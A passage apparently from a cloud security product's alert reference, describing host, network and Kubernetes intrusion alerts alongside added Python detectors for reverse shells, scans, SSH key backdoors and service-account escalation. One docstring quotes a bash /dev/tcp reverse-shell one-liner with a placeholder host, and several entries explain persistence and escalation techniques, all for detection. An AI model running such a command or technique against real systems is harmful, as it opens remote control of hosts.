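                 "principalId": "ecs-web-role/i-example01"}
INSTANCE_ADDRESSES = {"i-example01": {"203.0.113.10"}}
SRC = "198.51.100.77"  # the attacker's address in this constructed scenario

EVENTS = [
    ev("2025-01-01T10:00:%02dZ" % i, "DescribeInstances", region, "203.0.113.9", RAM_USER)
    for i, region in enumerate(["cn-hangzhou", "cn-shanghai", "cn-beijing",
                                "ap-southeast-1", "us-west-1"])
] + [
    ev("2025-01-01T10:05:00Z", "GetObject", "cn-hangzhou", SRC, INSTANCE_ROLE),
    ev("2025-01-01T10:10:00Z", "CreateUser", "cn-hangzhou", SRC, ADMIN_KEY,
       {"UserName": "svc-backup"}),
    ev("2025-01-01T10:10:05Z", "CreateLoginProfile", "cn-hangzhou", SRC, ADMIN_KEY,
       {"UserName": "svc-backup"}),
    ev("2025-01-01T10:10:09Z", "AttachPolicyToUser", "cn-hangzhou", SRC, ADMIN_KEY,
       {"UserName": "svc-backup", "PolicyName": "AdministratorAccess"}),
    # Benign: the instance itself listing instances in its own region.
    ev("2025-01-01T11:00:00Z", "DescribeInstances", "cn-hangzhou", "203.0.113.10", ADMIN_KEY),
]

if __name__ == "__main__":
    print(cross_region_enumeration(EVENTS))
    print(instance_role_from_foreign_ip(EVENTS, INSTANCE_ADDRESSES))
    print(backdoor_admin_users(EVENTS))
```

The three rules are deliberately stateless over a time window rather than a per-account baseline, which is what makes them cheap to run over an exported trail; the "calling IP is not from a common geographical location" condition the page attaches to most of these alerts would be an additional lookup on sourceIpAddress against the account's historical locations.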
Unusual Network Connection

Alert name

Description

Proactive connection to a malicious download source

The detection model found through HTTP traffic that your server is attempting to access a suspicious malicious download source. This may be an attacker downloading malicious files from a remote server through a weak password or command execution vulnerability, which endangers server security.

Suspected sensitive port scanning behavior

The detection model found that a process on your server initiated too many network requests to sensitive ports in a short period, which is suspected to be port scanning behavior.

Anomalous network connection in Windows

The detection model found that the network connection behavior of a process on your system is anomalous. It is very likely related to a virus, Trojan, or hacking behavior.

Reverse shell outbound network connection

Security Center detected a suspected reverse shell outbound network connection. With this technique the compromised host connects out to a server the attacker controls and attaches a shell to that connection, through which arbitrary commands can be executed; because the connection is outbound, it passes most inbound firewall rules. Investigate promptly. If it is an O&M operation or a normal business function, you can ignore the alert or mark it as a false positive.

Suspicious port listening

The detection model found a process listening on an unexpected port. This may be a bind shell or backdoor service waiting for an attacker to connect, or a normal service running on a non-standard port.

Internal network scan

The detection model found a process on your server that initiated suspected scanning behavior against specified ports of multiple internal IP addresses in a short period. This may be an attacker attempting lateral movement after an intrusion.

Manual call to a container API

Security Center found suspicious manual access to a container API. In scenarios where the container service has not enabled authentication and authorization, an attacker can access the container API to obtain container information, create containers, execute malicious commands in containers, and upload malicious images. There is also a chance that this is a normal manual operation by O&M. Investigate promptly.
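Two of the alerts above have host-level signatures that are easy to check directly. A reverse shell, however it was launched, ends up as a shell whose standard input, output, and error are a socket; a port scan is one process opening connections to many ports on few hosts, and an internal network scan is one process opening connections to the same port on many private addresses in a short window. The Python below is an added example that is not Security Center's detection code: the first function checks the fd layout of one process (with a /proc walker for live Linux hosts), the second classifies a list of connection events. The event tuple layout and all sample data are constructed for the example.

```python
import ipaddress
import os
from collections import defaultdict

SHELLS = {"sh", "bash", "dash", "ash", "zsh"}


def stdio_is_socket(fd_targets):
    """fd_targets maps an fd number to the readlink target of /proc/<pid>/fd/<n>.
    A shell whose stdin, stdout and stderr all point at a socket has the layout
    every reverse shell ends up with, whether started with
    `bash -i >& /dev/tcp/HOST/PORT 0>&1` or by a one-liner that dup2()s a
    socket onto fds 0-2 and then execs /bin/sh."""
    return all(fd_targets.get(fd, "").startswith("socket:") for fd in (0, 1, 2))


def find_reverse_shells(proc_root="/proc"):
    """Walk /proc on a Linux host and return [(pid, comm)] for shells whose
    stdio is a socket. Returns [] where /proc is absent. Reading another
    user's fd links needs root, so unreadable processes are skipped."""
    hits = []
    if not os.path.isdir(proc_root):
        return hits
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            with open(os.path.join(proc_root, pid, "comm")) as f:
                comm = f.read().strip()
            targets = {int(n): os.readlink(os.path.join(fd_dir, n))
                       for n in os.listdir(fd_dir)}
        except (OSError, ValueError):
            continue  # process exited, or we lack permission
        if comm in SHELLS and stdio_is_socket(targets):
            hits.append((int(pid), comm))
    return hits


def classify_scans(connections, window=10.0, min_targets=20):
    """connections: (timestamp_seconds, pid, dst_ip, dst_port) for outbound
    connection attempts, e.g. sampled from conntrack or an eBPF connect() hook.
    Returns {pid: "port-scan" | "internal-network-scan"} using a sliding window
    per process: many ports on at most two hosts is a port scan, at most two
    ports across many private hosts is a lateral-movement sweep."""
    per_pid = defaultdict(list)
    for ts, pid, ip, port in connections:
        per_pid[pid].append((ts, ip, port))
    findings = {}
    for pid, conns in per_pid.items():
        conns.sort()
        for i, (t_end, _, _) in enumerate(conns):
            recent = [(ip, port) for ts, ip, port in conns[:i + 1] if t_end - ts <= window]
            hosts = {ip for ip, _ in recent}
            ports = {port for _, port in recent}
            if (len(hosts) >= min_targets and len(ports) <= 2
                    and all(ipaddress.ip_address(h).is_private for h in hosts)):
                findings[pid] = "internal-network-scan"
            elif len(ports) >= min_targets and len(hosts) <= 2:
                findings[pid] = "port-scan"
    return findings


# Constructed sample: pid 4242 sweeps 10.0.0.1-30 on port 22 in three seconds,
# pid 5151 probes 40 ports on one host, pid 100 makes three ordinary connections.
SAMPLE_CONNECTIONS = (
    [(0.1 * i, 4242, "10.0.0.%d" % (i + 1), 22) for i in range(30)]
    + [(5.0 + 0.1 * i, 5151, "203.0.113.5", port) for i, port in enumerate(range(1, 41))]
    + [(20.0, 100, "203.0.113.80", 443), (21.0, 100, "203.0.113.81", 443),
       (22.0, 100, "10.0.0.5", 5432)]
)

if __name__ == "__main__":
    print(classify_scans(SAMPLE_CONNECTIONS))
    print(find_reverse_shells())
```

The thresholds are illustrative; tune window and min_targets against your own monitoring and orchestration traffic, which legitimately fans out to many hosts on one port, and whitelist those processes rather than raising the threshold for everyone.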

Malicious Script

Alert name

Detection details

Malicious script file found

The detection model found a malicious script file on your server. This file is highly likely to have been implanted by an attacker after successfully compromising the server. We recommend that you check the legitimacy of the file's content based on the malicious script's tag and handle it.

Malicious script code execution

The detection model found that malicious script code such as Bash, PowerShell, or Python is being executed on your server.

Suspicious download behavior found

The detection model found suspicious download behavior on your server. This download may be a command executed by an attacker after successfully compromising the server, for example fetching a second-stage payload with curl or wget and piping it straight into a shell. We recommend that you check the legitimacy of this command execution and handle it.

Suspicious script file found

The detection model found a suspicious script file on your server. This file may have been implanted by an attacker after successfully compromising the server. We recommend that you check the legitimacy of the file's content based on the malicious script's tag and handle it.

Suspicious script code execution

The detection model found that suspicious script code such as Bash, PowerShell, or Python is being executed on your server.

Malicious script

The agentless scan found a malicious script file on your server.

File containing malicious code

The detection model found a malicious script file on your server. This file is highly likely to have been implanted by an attacker after successfully compromising the server. We recommend that you check the legitimacy of the file's content based on the malicious script's tag and handle it.

File containing suspicious code

The detection model found a file containing suspicious code on your server. This file may have been implanted by an attacker after successfully compromising the server, but it can also be a legitimate file with unusual code. We recommend that you check the legitimacy of the file's content based on the tag in the alert and handle it.

Persistent Webshell

Alert name

Description

Anomalous code resident in memory

Security Center detected malicious code in the memory space of this process. This indicates that a legitimate process may have been injected with malicious instructions after startup, or the process file itself is malicious.

We recommend that you take the following actions:

1. Check the process file. If it is not a legitimate file, kill the process and quarantine the file. If it is a legitimate process that was injected, terminate it and restart it cleanly at a time that does not disrupt normal business.

2. In conjunction with other alert information on this machine, comprehensively assess the potential impact of this intrusion event on the business and take other response measures.

3. Try to analyze the cause of this intrusion event and fix the security vulnerabilities.

Backdoor process

The detection model found a suspicious process that appears to be a backdoor on your server. This may be a persistence mechanism left by an attacker to maintain access.

Auto-start backdoor

Security Center detected an anomalous auto-start item on your host, which is highly likely to have been implanted by malware or an attacker to maintain the persistence of a malicious program. If these auto-start items are not handled, the malicious program is very likely to be implanted again. Therefore, we recommend that you use "Virus Defense" to perform a comprehensive scan and cleanup of the host, or handle it manually based on the details in the alert.

Anomalous process persistence

The detection model found an anomalous process among the currently running programs on your server. It may be a malicious program or a normal program that has loaded malicious code.

Malicious startup item script

The detection model found that some auto-start item files on your server are suspicious. They may be persistence mechanisms created by malware or an attacker through scheduled tasks or auto-start scripts.

Hidden process

Security Center detected that this process is a hidden process, which cannot be displayed by conventional process viewing tools. Malware or attackers use various techniques to hide malicious program processes. The host is very likely to have been infected with a rootkit backdoor.

SSH public key backdoor

The detection model found an anomalous SSH logon public key on your server. This SSH public key has a history of being added to compromised servers by worms or attackers to maintain access.
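The alert above matches keys against a list of fingerprints seen on compromised hosts. The same check, plus two a practitioner usually wants alongside it (drift from an approved key baseline and forced-command options), is easy to run yourself over authorized_keys. The Python below is an added example, not Security Center's code: it parses authorized_keys lines including a quoted options field, computes the same SHA256 fingerprint that `ssh-keygen -lf` prints, and reports keys that are known-bad, unapproved, or carry command=. The sample keys, the known-bad set, and the allowlist are all constructed for the example; the key bytes are placeholders, not real key pairs.

```python
import base64
import binascii
import hashlib
import struct

KEY_TYPES = ("ssh-ed25519", "ssh-rsa", "ecdsa-sha2-", "sk-")


def ed25519_blob(raw32):
    """Encode 32 bytes as an OpenSSH ssh-ed25519 public-key blob. Used only to
    build sample keys for this example; the bytes are not a real key."""
    def ssh_string(b):
        return struct.pack(">I", len(b)) + b
    return base64.b64encode(ssh_string(b"ssh-ed25519") + ssh_string(raw32)).decode()


def fingerprint(blob_b64):
    """OpenSSH SHA256 fingerprint: base64 of sha256(decoded blob), '=' stripped."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def split_options(line):
    """Split a leading options field from the rest of an authorized_keys line.
    Options end at the first space outside double quotes, so command="ls -l"
    stays intact."""
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            in_quote = not in_quote
        elif ch == " " and not in_quote:
            return line[:i], line[i + 1:].lstrip()
    return line, ""


def parse_authorized_keys(text):
    """Yield (options, key_type, blob, comment) for each key line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        options, rest = ("", line) if line.startswith(KEY_TYPES) else split_options(line)
        fields = rest.split(None, 2)
        if len(fields) < 2:
            continue  # not a key line
        yield options, fields[0], fields[1], (fields[2] if len(fields) == 3 else "")


def audit_authorized_keys(text, known_bad, allowlist):
    """Return {fingerprint: [reasons]} for keys that deserve a look. Blobs that
    do not decode are reported under an "<undecodable:...>" key."""
    report = {}
    for options, key_type, blob, comment in parse_authorized_keys(text):
        try:
            fp = fingerprint(blob)
        except (binascii.Error, ValueError):
            report["<undecodable:%s>" % (comment or key_type)] = ["key blob does not decode"]
            continue
        reasons = []
        if fp in known_bad:
            reasons.append("known backdoor key fingerprint")
        if fp not in allowlist:
            reasons.append("not in the approved key baseline")
        if "command=" in options:
            reasons.append("forced command: " + options)
        if reasons:
            report[fp] = reasons
    return report


# Constructed sample keys and lists (placeholders, not real keys or intel).
GOOD_BLOB = ed25519_blob(bytes([1] * 32))
BAD_BLOB = ed25519_blob(bytes(range(32)))
ODD_BLOB = ed25519_blob(bytes([2] * 32))
KNOWN_BAD = {fingerprint(BAD_BLOB)}    # fingerprints seen on compromised hosts
ALLOWLIST = {fingerprint(GOOD_BLOB)}   # keys approved for this host

SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# approved deploy key",
    "ssh-ed25519 %s deploy@ci" % GOOD_BLOB,
    "ssh-ed25519 %s" % BAD_BLOB,
    'command="/usr/bin/true",no-pty ssh-ed25519 %s svc' % ODD_BLOB,
    "ssh-rsa not*valid*base64 stale-entry",
])

if __name__ == "__main__":
    for fp, reasons in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_BAD, ALLOWLIST).items():
        print(fp, reasons)
```

Run it over every authorized_keys file on the host, not only root's: worms add keys to whichever account they landed in, and sshd also honours AuthorizedKeysFile paths set in sshd_config, so read that directive rather than assuming ~/.ssh/authorized_keys.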

Cobalt Strike remote control Trojan

A Cobalt Strike remote control backdoor was detected in the memory of this process.

It is possible that an attacker used process injection techniques to inject malicious code across processes into this process. Even if the original file of this process is normal, it will execute malicious code after being injected.

It is also possible that the program itself is malicious.

We recommend that you take the following measures:

1. Check the process file. If it is not a legitimate file, kill the process and quarantine the file. If it is a legitimate process that was injected, terminate it and restart it cleanly at a time that does not disrupt normal business.

2. In conjunction with other alert information on this machine, comprehensively assess the potential impact of this intrusion event on the business and take other response measures.

3. Try to analyze the cause of this intrusion event and fix the security vulnerabilities.

Hidden kernel module

The detection model found a hidden kernel module on your server. It is highly likely to be a rootkit backdoor implanted by an attacker or malware to maintain system privileges and hide other malicious activities.

Backdoor resident in web application memory

Suspicious code or data was detected in the web application process on the host. This could be intermediate code generated when a vulnerability is exploited or a backdoor installed by an attacker to maintain access. This type of backdoor exists only in the process memory and does not require a file to be saved on the disk. We recommend that you first fix the web application vulnerability and restart the web application to disable the backdoor, and at the same time, pay attention to other related alerts on the host. If you are sure that this alert is a false positive, you can choose to ignore or whitelist the alert.

Kerberos ticket injection attack

The detection model found a Kerberos ticket being injected into a logon session on your server. Attackers inject stolen or forged tickets (pass-the-ticket, golden or silver tickets) to authenticate to domain services without knowing the account's password.

WMI event subscription persistence attack

The detection model found a WMI permanent event subscription (an event filter bound to a consumer such as CommandLineEventConsumer) on your server. Attackers use these subscriptions to run a payload whenever a chosen system event occurs; they survive reboots and leave nothing in the usual startup locations.

Skeleton Key domain controller persistence attack

The detection model found a Skeleton Key on a domain controller. A Skeleton Key patches the LSASS process in memory so that a master password chosen by the attacker is accepted for any domain account while the accounts' real passwords keep working. It does not survive a reboot, so expect the attacker to have another persistence mechanism as well.

Process path spoofing

The detection model found a process whose reported executable path or name does not match the image actually mapped in its memory, a masquerading technique used to make malicious code look like a legitimate system program.

Anomalous registry key

The detection model found a suspicious registry configuration item on your server. Malware often modifies certain key registry configurations to run persistently or interfere with normal security protection.

Anomalous library file loading

The detection model found a process loading a library from an unusual location or one that is not among its expected dependencies, which is how DLL side-loading and LD_PRELOAD-style injection get attacker code into a trusted process.

Process executable image tampering

The detection model found that the executable image mapped in a running process no longer matches the file on disk, which is characteristic of process hollowing or in-memory patching of a legitimate program.

SID History injection attack

The detection model found a privileged SID being written to an account's SID History attribute. An account whose SID History contains, for example, the Domain Admins SID is granted that group's permissions, which lets an attacker keep domain privileges on an unremarkable account.

Dynamic-link library function hijacking

The detection model found that exported functions of a dynamic-link library loaded in a process have been hooked or redirected, so calls the process makes through that library are diverted to attacker-controlled code.

Anomalous .NET module loaded into memory

The detection model found a .NET assembly loaded into a process directly from memory rather than from a file on disk, a technique used by fileless tooling to avoid file-based scanning.

Anomalous scheduled task

The detection model found a suspicious scheduled task (a cron entry on Linux or a Task Scheduler job on Windows) that runs a program periodically, at boot, or at logon, a common persistence mechanism.

Anomalous thread execution

The detection model found a thread in a process executing code that does not belong to any loaded module (for example, in an anonymous memory region), which is characteristic of injected shellcode or a reflectively loaded payload.

Process hiding behavior

The detection model found a process that is hidden from standard process listings (such as ps or Task Manager), typically by a rootkit that hooks the process enumeration APIs or filters the /proc file system.

Anomalous code found in web application memory

Anomalous code found in web application memory

Anomalous service in Linux

The detection model found a suspicious system service (such as a systemd unit or an init script) on your server that was created or modified to start a malicious program at boot.

Anomalous service in Windows

The detection model found a suspicious Windows service that was created or modified to start a malicious program at boot or on demand. Attackers favor services because they run as SYSTEM and are restarted automatically.

System base library file hijacking

The detection model found that a base system library (such as libc on Linux or a core DLL on Windows) was replaced or modified, so that every program loading it runs attacker code.

Process runtime function hijacking

The detection model found that functions inside a running process were hooked at runtime (for example, through inline patches or import-table modification) to divert execution to injected code.

Anomalous startup script in Linux

The detection model found a suspicious startup script on your server (such as an entry in rc.local, an init.d script, or a unit file) that runs a program at boot.

Anomalous terminal configuration file in Linux

The detection model found a suspicious modification to a shell configuration file on your server (such as .bashrc, .profile, or a file under /etc/profile.d). Commands placed there run every time a user opens a shell, which is a quiet way to persist or to hijack commands through aliases.

Sensitive File Tampering

Alert name

Description

System file tampering

The detection model found a process on your server attempting to modify or replace system files. This may be an attacker trying to evade detection, hide a backdoor, or achieve other objectives by replacing system files. Promptly confirm whether the system file in the alert on your server is a genuine system file.

System file moving

The detection model found a process on your server attempting to move system files. This may be an attacker trying to bypass detection logic by moving system files that are monitored by security software during an intrusion.

Suspicious tampering of the Linux shared library preload configuration file

The detection model found that the shared library preload configuration file on your server (/etc/ld.so.preload) is being suspiciously tampered with. Every library listed in this file is loaded into every dynamically linked program before anything else, which makes it a favorite hook for user-space rootkits that hide files, processes, and network connections.

Container Cluster Anomaly

Alert name

Description

Suspicious command executed by calling the Kubernetes API to enter a container

Security Center detected the behavior of calling the Kubernetes API to enter a container and execute a suspicious command. This is common in lateral movement attacks across various scenarios, such as between containers or between a node and a container. There is also a chance that this is a normal business or O&M requirement.

Malicious image pod startup

A pod containing a malicious image was detected starting in your Kubernetes cluster. This is common when the image contains malicious programs such as backdoors or mining programs.

Kubernetes service account lateral movement

The detection model found that one of your service accounts requested permissions outside its historical baseline or triggered multiple authentication failures. This usually occurs when an attacker intrudes into a pod and uses the service account token mounted in the compromised pod to attack the API server. Investigate promptly.

Successful authentication of a Kubernetes anonymous user

A successful anonymous logon event was detected. It is not recommended to allow anonymous users to access important resources in a business cluster. The risk is extremely high when a cluster is exposed to the public network and allows anonymous access. This is common when an attacker uses anonymous authentication to enter and control the Kubernetes API server to issue tasks. Promptly investigate whether this operation was triggered by a trusted user and restrict the access permissions of anonymous users.

Anomalous access to Kubernetes Secrets

The detection model found that Secrets are being enumerated in your Kubernetes cluster. This may mean that an attacker is stealing sensitive information from Kubernetes Secrets after your cluster has been compromised. Promptly investigate whether this operation was triggered by a trusted program or administrator.

Suspicious Kubernetes operation sequence

Security Center detected that an account in your Kubernetes cluster executed a series of high-risk commands outside the baseline. Please check whether this command was executed by trusted O&M personnel. Otherwise, your cluster is very likely to have been compromised by an attacker. If it is confirmed to be a trusted behavior, you can add it to the whitelist to filter out subsequent alerts for similar behaviors.

Kubernetes user bound to an administrator role

Security Center detected that a user in your Kubernetes cluster is being bound to a high-privilege system role (ClusterRole). Please confirm that this action was triggered by O&M personnel or a system component. Otherwise, your server may have been compromised by an attacker who is using this method to leave a backdoor account. If you confirm it is a false positive, you can ignore such alerts by adding it to the whitelist.

Suspected Kubernetes service man-in-the-middle attack (CVE-2020-8554)

In a Kubernetes cluster, a user who can create Services can set a Service's externalIPs field to an address that other workloads talk to, so that traffic destined for that address is routed to endpoints the user controls and can be read or modified. Security Center detected that a Service created in your Kubernetes cluster specifies an external IP in externalIPs. This matches the exploitation characteristics of the Kubernetes man-in-the-middle vulnerability (CVE-2020-8554).

Node sensitive directory mounting

Security Center found that your pod mounted a sensitive directory or file at startup, which poses a container escape risk. Once the pod is compromised, an attacker has a chance to escape from the pod and control the node by mounting sensitive files. It is recommended to minimize the configuration of pods mounting sensitive host directories, such as the root directory, scheduled task configuration directory, and system service configuration directory. If it is a necessary business requirement with controllable risks, you can add it to the whitelist and ignore this alert.

Suspicious request to the Kubernetes API server

A suspicious request to the Kubernetes API server was detected. See the alert details for the specific anomalous reason. There is also a chance that this is a normal business operation. You can focus on checking the source IP of the operation request, the User Agent used, the resource being operated on, and the user who initiated the request to determine if it is normal. To view the complete Kubernetes API server request log, you can use the auditID field in the alert details to search based on the Kubernetes audit log SLS information in the alert details.

Kubernetes cluster user bound to a high-privilege role

A Kubernetes cluster user was detected being bound to a high-privilege role. High privilege refers to the permission to read and operate on important resources in a namespace or the entire cluster, such as cluster administrator, reading all secrets in a namespace, creating pods and logging into pods to execute commands, and creating high-privilege roles. When an attacker obtains the credentials of a high-privilege user, they can use such permissions for lateral movement or privilege escalation within the cluster, ultimately achieving control of the entire cluster. A common attack scenario is when a web application's service account is granted excessive privileges. An attacker enters a pod through a web application vulnerability, reads and uses the service account credential to further access and control other cluster resources.

Anomalous token creation by a service account

Creating a service account token (a TokenRequest) is normally initiated by a real user of the cluster or by the kubelet on a pod's behalf. A service account is a built-in object in Kubernetes that is associated with a specific namespace and can be used by processes in a pod to interact with the Kubernetes API server. When a service account attempts to obtain another service account's token, a privilege escalation may be in progress.

Service account modifies its own cluster role permissions

The set of cluster role permissions owned by an application's service account is generally not modified by the service account itself after creation. Therefore, when a service account requests to modify the permissions of the cluster role it is bound to, it usually represents a privilege escalation.

Service account modifies its bound cluster role

An application's service account usually does not modify the cluster role it is bound to. Therefore, when a service account creates a role and binds it to itself, it usually represents a privilege escalation.

Service account impersonates another user principal to request resources

An application's service account usually does not need to impersonate another user principal to request resources. Therefore, when a service account impersonates another user principal to make a request, a privilege escalation may occur.

Creating and configuring service accounts for system component pods

Cluster system component service accounts usually have high privileges and should not be referenced by other workloads. Therefore, when a service account creates a pod that is configured with a system component service account, it usually represents a privilege escalation.

Suspicious request to probe its own permission set

Workloads in a cluster rarely initiate requests to check their own service account permissions. Therefore, when a service account requests to obtain the set of permissions it owns, it may indicate that the service account has been controlled by an attacker.

Node identity obtains a cluster secret

The kubelet certificate of a cluster node has the permission to obtain secrets. This capability can be abused by an attacker to obtain sensitive secret resources in the cluster. Therefore, when a node identity requests to obtain a secret, it usually represents a privilege escalation.

Service account creates a node proxy resource to execute a command

A node proxy resource can be used to execute commands in a pod, but business workloads in a cluster generally do not need to use this method. Therefore, when a service account executes a command in a pod as a node proxy resource, it usually represents a privilege escalation.

Service account steals another node's pod

A taint is a Kubernetes scheduling feature that restricts whether a pod can be scheduled onto a given node. An attacker who has compromised a node can mark every node other than the compromised one as unschedulable, so that the target pod is rescheduled onto the compromised node, where its credentials can then be obtained. When a service account creates taints on many nodes, a privilege escalation may be in progress.

Service account directly accesses the kubelet listening port

Port 10250 is the kubelet API port, used for communication between the API server and the kubelet. Business workloads within the cluster usually do not use a service account to access this port. When a service account directly accesses the kubelet listening port and requests a specific resource, it usually represents a privilege escalation.

Service account creates a temporary container to enter a pod

An ephemeral container is a mechanism that lets developers debug a running pod: the developer enters the target pod's namespaces by creating an ephemeral container in it. Such operations should not be initiated by a service account. When a service account requests to create an ephemeral container, it usually means an attacker is using that identity to attempt to enter another pod for privilege escalation.
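The service-account and node-identity patterns described above are visible in Kubernetes audit-log events. The following detector is an added example, not Security Center code: it matches audit events (fields per the Kubernetes audit Event schema) against those patterns, and the "many nodes" threshold and the sample events are constructed.

```python
# Added example (not Security Center code): match Kubernetes audit-log events against
# the escalation patterns above. Event fields follow the audit Event schema; rest is constructed.
SA_PREFIX, NODE_PREFIX = "system:serviceaccount:", "system:node:"
TAINT_NODE_THRESHOLD = 3  # constructed: taints on this many nodes count as "many"
SELF_REVIEWS = ("selfsubjectaccessreviews", "selfsubjectrulesreviews")

def classify(event):
    """Return an alert tag for one audit event, or None if it looks benign."""
    user = event.get("user", {}).get("username", "")
    ref = event.get("objectRef", {})
    verb, res, sub = event.get("verb"), ref.get("resource"), ref.get("subresource")
    is_sa = user.startswith(SA_PREFIX)
    if user.startswith(NODE_PREFIX) and verb in ("get", "list") and res == "secrets":
        return "node_reads_secret"           # node identity obtains a cluster secret
    if is_sa and "impersonatedUser" in event:
        return "sa_impersonation"            # SA impersonates another principal
    if is_sa and verb == "create" and res in SELF_REVIEWS:
        return "sa_self_permission_probe"    # SA probes its own permission set
    if is_sa and res == "pods" and sub == "ephemeralcontainers":
        return "sa_ephemeral_container"      # SA attaches an ephemeral container
    if is_sa and verb in ("update", "patch") and res == "clusterroles":
        return "sa_clusterrole_modify"       # simplified: any ClusterRole change by an SA
    return None

def detect(events):
    alerts, tainted = [], {}                 # tainted: SA -> set of node names it tainted
    for ev in events:
        user, ref = ev.get("user", {}).get("username", ""), ev.get("objectRef", {})
        tag = classify(ev)
        if tag:
            alerts.append((tag, user))
        spec = (ev.get("requestObject") or {}).get("spec") or {}
        if user.startswith(SA_PREFIX) and ref.get("resource") == "nodes" and "taints" in spec:
            tainted.setdefault(user, set()).add(ref.get("name"))
    alerts += [("sa_mass_node_taint", u) for u, nodes in tainted.items()
               if len(nodes) >= TAINT_NODE_THRESHOLD]
    return alerts

def event(user, verb, resource, name=None, **extra):
    return {"user": {"username": user}, "verb": verb,
            "objectRef": {"resource": resource, "name": name}, **extra}

# Constructed samples: permission probe, node secret read, benign read, three node taints.
SA = "system:serviceaccount:shop:web"
SAMPLE_EVENTS = [event(SA, "create", "selfsubjectrulesreviews"),
                 event("system:node:worker-1", "get", "secrets", "cloud-creds"),
                 event(SA, "get", "configmaps", "app-config")] + [
    event(SA, "patch", "nodes", n, requestObject={"spec": {"taints": [{"effect": "NoSchedule"}]}})
    for n in ("worker-2", "worker-3", "worker-4")]
```

Running `detect(SAMPLE_EVENTS)` yields the probe, the node secret read and a mass-taint alert for the service account, while the ConfigMap read and each single taint on its own stay silent.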

Suspicious Account

Alert name

Description

Backdoor account

An anomalous account was detected in the system. An attacker or malicious program may create a new account or activate a guest account to maintain access. If this is not an account used for normal business needs, we recommend that you log in to the host to handle it.

Webshell Detection (Local Scan)

Alert name

Description

Webshell file found

Scores the threat level based on file behavior to identify suspicious files with dangerous functions and features. These files may have been implanted by an attacker after an intrusion, but they could also be normal files with suspicious code or log files (an alert may also be triggered if logs are stored in a web path). The administrator needs to confirm their legitimacy.

Exploit

Alert name

Description

Web vulnerability exploit

Web vulnerability exploit.

Host vulnerability exploit

Host vulnerability exploit.

Suspected escape by file tampering

Security Center detected the action of opening an important file in "write mode". This is common in scenarios of escaping from a container to the host by tampering with the file. You can focus on investigating whether the process, the operated file, and the file's opening properties originate from normal business operations. If it is an O&M operation or a normal business function, ignore the alert or mark it as a false positive.

TOCTOU-type vulnerability exploit

Security Center detected suspected time-of-check-to-time-of-use (TOCTOU) vulnerability exploitation behavior. See the alert details for the vulnerability number. This type of vulnerability is commonly used for container escape, privilege escalation, and more. We recommend that you check whether the related software is within the scope of the vulnerability and fix the vulnerability promptly. False positives are possible but rare; if you confirm one, mark the alert as a false positive or add it to the whitelist.

Container starts by mounting a sensitive host directory

Security Center found that a container has risky behavior, such as starting in privileged mode or mounting a sensitive directory or file at startup. In this scenario, an attacker has a chance to escape to the host by exploiting the dangerous configuration. It is recommended not to start in privileged mode and not to configure the pod to mount sensitive host directories, such as the root directory, scheduled task configuration directory, or system service configuration directory.

Abnormal Network Traffic

Alert name

Description

Suspicious file upload

The detection model found suspicious file upload traffic in your server's traffic, and a related suspicious file has landed on or been modified on the host. Please make a further judgment based on the alert details. The recommended investigation steps are as follows: 1) Check for any associated webshell file alerts. 2) Check whether the file upload point seen in the traffic can be maliciously exploited. 3) Check whether the file on the host results from a known legitimate action, such as an administrator's upload, file creation or modification, a web service update, or a backup. If so, ignore the alert or add a path whitelist. 4) If a malicious file upload is confirmed, handle the malicious file on the machine and harden the file upload point. A whitelist of permitted file names is a recommended hardening measure.

Web application command execution

The detection model found malicious web attack traffic in your server's traffic, and a corresponding command was executed on the endpoint. This means your service may have a vulnerability that has been exploited by an attacker. Please make a further judgment based on the alert details.

Mining pool communication traffic

The detection model found traffic communicating with a mining pool IP on your server. Your server may have been compromised by an attacker and used for mining.

Tunnel proxy communication

The detection model found suspicious tunnel proxy communication traffic in your server's traffic. Please make a further judgment based on the alert details.

Reverse shell traffic

The detection model found malicious reverse shell traffic in your server's traffic. An attacker used this method to establish a reverse network connection with their own server, through which arbitrary commands can be executed. Please make a further judgment based on the alert details.

Backdoor communication traffic

The detection model found malicious backdoor communication traffic in your server's traffic. An attacker used this method to establish a remote control channel with their own server. Please make a further judgment based on the alert details.

Java deserialization attack

The detection model found malicious Java deserialization attack traffic in your server's traffic, and the Java process has a suspicious outbound network connection or has executed a suspicious command. This means your service may have a vulnerability that has been exploited by an attacker. Please make a further judgment based on the alert details.

DNS-log attack

The detection model found malicious DNS-log attack traffic in your server's traffic, and the server accessed the DNS-log domain. This means your service may have a vulnerability that has been exploited by an attacker. Please make a further judgment based on the alert details.

Container Escape Prevention

Alert name

Description

High-risk system call

Security Center detected a key system call that is commonly used in privilege escalation and container escape behaviors that exploit kernel vulnerabilities.

Escape by exploiting a vulnerability or misconfiguration

Commonly seen when a container is started with high privileges or mounts a pseudo file system, which allows an attacker to use system mechanisms like core_pattern or cgroup inside the container to escape.

Modifying a host user configuration file

Commonly seen when a container starts by mounting a system user configuration file like /etc/passwd or the SSH service configuration directory, which allows an attacker to gain host node user privileges by modifying such files from within the container.

Escaping by writing to a high-risk host directory

Commonly seen when a container starts by mounting host scheduled task configuration, such as /etc/crontab, auto-start configuration, such as /etc/init.d, login-triggered scripts, such as /etc/profile, or Kubernetes static pod configuration directories. An attacker who can write malicious code to these locations gets it executed automatically by the host and thereby gains host privileges.

Running a container escape tool

Security Center detected an escape tool starting inside a container. This is common when an attacker, after compromising a container, attempts to break the isolation between the container and the host node to gain access control of the host.
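The "Container starts by mounting a sensitive host directory" alert and the three mount-related escape alerts above describe pod settings that can be checked before a pod ever runs. The following manifest check is an added example, not Security Center code: it flags privileged mode and hostPath mounts that expose the host locations this page names, and the sensitive-path list and the sample pod are constructed.

```python
# Added example (not Security Center code): flag the risky pod settings described above,
# privileged mode and hostPath mounts of sensitive host locations, in a pod manifest.
# The path list is constructed from the locations this page names.
import posixpath

SENSITIVE_HOST_PATHS = (
    "/etc/passwd", "/etc/shadow", "/etc/ssh",       # host user and SSH configuration
    "/etc/crontab", "/etc/cron.d",                  # scheduled tasks
    "/etc/init.d", "/etc/systemd", "/etc/profile",  # auto-start and login-triggered tasks
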